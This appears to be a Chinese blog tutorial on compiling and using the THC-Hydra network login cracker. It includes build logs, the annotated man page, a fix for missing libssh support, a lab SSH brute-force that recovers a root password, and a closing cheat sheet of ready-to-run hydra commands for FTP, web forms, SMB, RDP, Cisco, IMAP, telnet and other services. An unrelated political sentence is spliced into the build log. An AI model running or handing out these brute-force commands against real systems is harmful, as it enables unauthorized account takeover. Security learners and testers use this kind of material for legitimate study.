hydra-xmpp.o hydra-http-proxy-urlenum.o hydra-snmp.o hydra-cvs.o hydra-smtp.o hydra-smtp-enum.o hydra-sapr3.o hydra-ssh.o hydra-sshkey.o hydra-teamspeak.o hydra-postgres.o hydra-rsh.o hydra-rlogin.o hydra-oracle-listener.o hydra-svn.o hydra-pcanywhere.o hydra-sip.o hydra-oracle-sid.o hydra-oracle.o hydra-vmauthd.o hydra-firebird.o hydra-afp.o hydra-ncp.o hydra-http-proxy.o hydra-http-form.o hydra-irc.o hydra-rdp.o crc32.o d3des.o bfg.o ntlm.o sasl.o hmacmd5.o hydra-mod.o -lm -lssl -lpcre -lpq -lsvn_client-1 -lapr-1 -laprutil-1 -lsvn_subr-1 -lcrypto -L/usr/lib -L/usr/local/lib -L/lib -L/usr/lib -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H 97 98 If men could get pregnant, abortion would be a sacrament 99 100 101 Now type make install 102 103 Now type make install 104 strip hydra pw-inspector 105 echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null 106 mkdir -p /usr/local/bin 107 cp -f hydra pw-inspector /usr/local/bin && cd /usr/local/bin && chmod 755 hydra pw-inspector 108 echo OK > /dev/null && test -x xhydra && cp xhydra /usr/local/bin && cd /usr/local/bin && chmod 755 xhydra || echo OK > /dev/null 109 sed -e "s|^INSTALLDIR=.*|INSTALLDIR="/usr/local"|" dpl4hydra.sh > /usr/local/bin/dpl4hydra.sh 110 chmod 755 /usr/local/bin/dpl4hydra.sh 111 cp -f *.csv /usr/local/etc/ 112 mkdir -p /usr/local/man/man1 113 cp -f hydra.1 xhydra.1 pw-inspector.1 /usr/local/man/man1
到这里已经安装完成 可以man下hydra的使用方法
1 [root@localhost hydra-7.4.2]# man hydra 2 HYDRA(1) HYDRA(1) 3 4 NAME 5 hydra - a very fast network logon cracker which support many different services 6 7 SYNOPSIS 8 hydra 9 [[[-l LOGIN|-L FILE] [-p PASS|-P FILE|-x OPT]] | [-C FILE]] [-e nsr] 10 [-u] [-f] [-F] [-M FILE] [-o FILE] [-t TASKS] [-w TIME] [-W TIME] 11 [-s PORT] [-S] [-4/6] [-vV] [-d] 12 server service [OPTIONAL_SERVICE_PARAMETER] 13 14 DESCRIPTION 15 Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is 16 flexible and very fast. 17 18 This tool gives researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from 19 remote to a system. 20 21 Currently this tool supports: 22 AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, FTPS, 23 HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, 24 HTTP-PROXY-URLENUM, ICQ, IMAP, IRC, LDAP2, LDAP3, MS-SQL, MYSQL, NCP, NNTP, 25 Oracle, Oracle-Listener, Oracle-SID, PC-Anywhere, PCNFS, POP3, POSTGRES, 26 RDP, REXEC, RLOGIN, RSH, SAP/R3, SIP, SMB, SMTP, SMTP-Enum, SNMP, 27 SOCKS5, SSH(v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, 28 VMware-Auth, VNC and XMPP. 29 For most protocols, SSL mode is available (e.g. https-get, ftp-ssl, etc.) 30 If not all necessary libraries are found during compile time, your 31 available services will be less. Type "hydra" to see what is available. 32 33 Options 34 target a target to attack, can be an IPv4 address, IPv6 address or DNS name. 35 36 service 37 a service to attack, see the list of protocols available 38 39 OPTIONAL SERVICE PARAMETER 40 Some modules have optional or mandatory options. type "hydra -U <servicename>" 41 to get help on on the options of a service. 42 43 -R restore a previously aborted session. Requires a hydra.restore file was written. No other options are allowed when using -R
继续从上一次进度接着破解 44 45 -S connect via SSL 46 大写,采用SSL链接 47 -s PORT 48 if the service is on a different default port, define it here 小写,可通过这个参数指定非默认端口 49 50 -l LOGIN 51 or -L FILE login with LOGIN name, or load several logins from FILE 53 -p PASS 54 or -P FILE try password PASS, or load several passwords from FILE 55 56 -x min:max:charset 57 generate passwords from min to max length. charset can contain 1 58 for numbers, a for lowcase and A for upcase characters. 59 Any other character is added is put to the list. 60 Example: 1:2:a1%. 61 The generated passwords will be of length 1 to 2 and contain 62 lowcase letters, numbers and/or percent signs and dots. 63 64 -e nsr additional checks, "n" for null password, "s" try login as pass, "r" try the reverse login as pass 65 66 -C FILE 67 colon separated "login:pass" format, instead of -L/-P options 68 69 -u by default Hydra checks all passwords for one login and then tries the next login. This option loops around the passwords, so 70 the first password is tried on all logins, then the next password. 71 72 -f exit after the first found login/password pair (per host if -M) 73 74 -F exit after the first found login/password pair for any host (for usage with -M) 75 76 -M FILE 77 server list for parallel attacks, one entry per line 78 79 -o FILE 80 write found login/password pairs to FILE instead of stdout 81 82 -t TASKS 83 run TASKS number of connects in parallel (default: 16) 84 85 -w TIME 86 defines the max wait time in seconds for responses (default: 32) 87 88 -w TIME 89 defines a wait time between each connection a task performs. This usually only makes sense if a low task number is used, .e.g 90 -t 1 91 92 -4 / -6 93 prefer IPv4 (default) or IPv6 addresses 94 95 -v / -V 96 verbose mode / show login+pass combination for each attempt -d debug mode 97 98 -h, --help 99 Show summary of options. 100 101 SEE ALSO 102 xhydra(1), pw-inspector(1). 103 The programs are documented fully by van Hauser <vh@thc.org> 104 105 AUTHOR 106 hydra was written by van Hauser / THC <vh@thc.org> and is co-maintained by David Maciejak <david.maciejak@gmail.com>. 107 108 This manual page was written by Daniel Echeverry <epsilon77@gmail.com>, for the Debian project (and may be used by others). 109 110 24/05/2012 HYDRA(1)
下面来演示下破解;
首先本人只是实验没有真正的去网上下载密码库字典,手动写了两个文件 users.txt和password.txt
1 [root@localhost hydra-7.4.2]# cat users.txt 2 root 3 [root@localhost hydra-7.4.2]# cat password.txt 4 111...AAA 5 111...aaa 6 abcdddccc 7 baidu.com 8 DELL2012. 9 ddddaaa11
不过在运行命令的时候报错了0 0!
[root@localhost~]#hydra 192.168.1.253 ssh -l root -p passwrod.txt [ERROR] Compiled without LIBSSH v0.4.x support, module is not available!
提示没有libssh这个支持 真的吗?
[root@localhost ~]#rpm -qa |grep libssh*
查看是什么都没有- -!
好嘛yum下试试
[root@localhost ~]#yum -y install libssh*
Loaded plugins: fastestmirror, refresh-packagekit
Loading mirror speeds from cached hostfile
* base: mirrors.btte.net
* extras: mirrors.btte.net
* updates: centos.ustc.edu.cn
Setting up Install Process
No package libssh-0.4.8 available.
No package libssh-0.4.8.tar.gz available.
Error: Nothing to do
呵呵 原来没有rpm包只有源码
查看了下网上找下
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxvf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install
这个可行,不过我cp代码提示错误 只好手工敲了一遍OK可以安装成功!
然后重新编译下hydra 进入到解压目录
cd ../../hydra-7.4.2/
然后执行 make clean
1 然后执行 经典三部曲 2 ./configure 3 make && make install 4 安装如无报错跟上文编译提示一样。 5 好了OK现在安装完毕 6 现在执行下试试 7 [root@localhost ~]# hydra 192.168.1.253 ssh -l root -P passwrod.txt 8 Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only 9 10 Hydra (http://www.thc.org/thc-hydra) starting at 2013-06-19 00:14:00 11 [DATA] 7 tasks, 1 server, 7 login tries (l:1/p:7), ~1 try per task 12 [DATA] attacking service ssh on port 22 13 [22][ssh] host: 192.168.1.253 login: root password: DELL2012. 14 1 of 1 target successfully completed, 1 valid password found 15 Hydra (http://www.thc.org/thc-hydra) finished at 2013-06-19 00:14:02 16 17 呵呵这里要说明下 password.txt是本人手写的强大的密码库可以去网上下载 18 [root@localhost ~]# cat passwrod.txt 19 adsadsa 20 sadsaqhjk 21 132321hj 22 dsads13213 23 DELL2012. 24 DSADJHK. 25 111...AAA 26 呵呵我的就这么几个密码数据所有破解起来是比较快的
当然上述只是一个实验,想要获取更好的体验效果可以下载更强大的密码库文件!
更多的使用技巧
五、其他类型密码破解
- 破解ftp:
# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV # hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
- get方式提交,破解web登录:
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
- post方式提交,破解web登录:
该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:
<form action="index.php" method="POST"> <input type="text" name="name" /><BR><br> <input type="password" name="pwd" /><br><br> <input type="submit" name="sub" value="提交"> </form>
假设有以上一个密码登录表单,我们执行命令:
# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”
说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。
后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。
- 破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
- 破解teamspeak:
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
- 破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
- 破解smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
- 破解pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
- 破解rdp:
# hydra ip rdp -l administrator -P pass.txt -V
- 破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
- 破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
- 破解telnet
# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V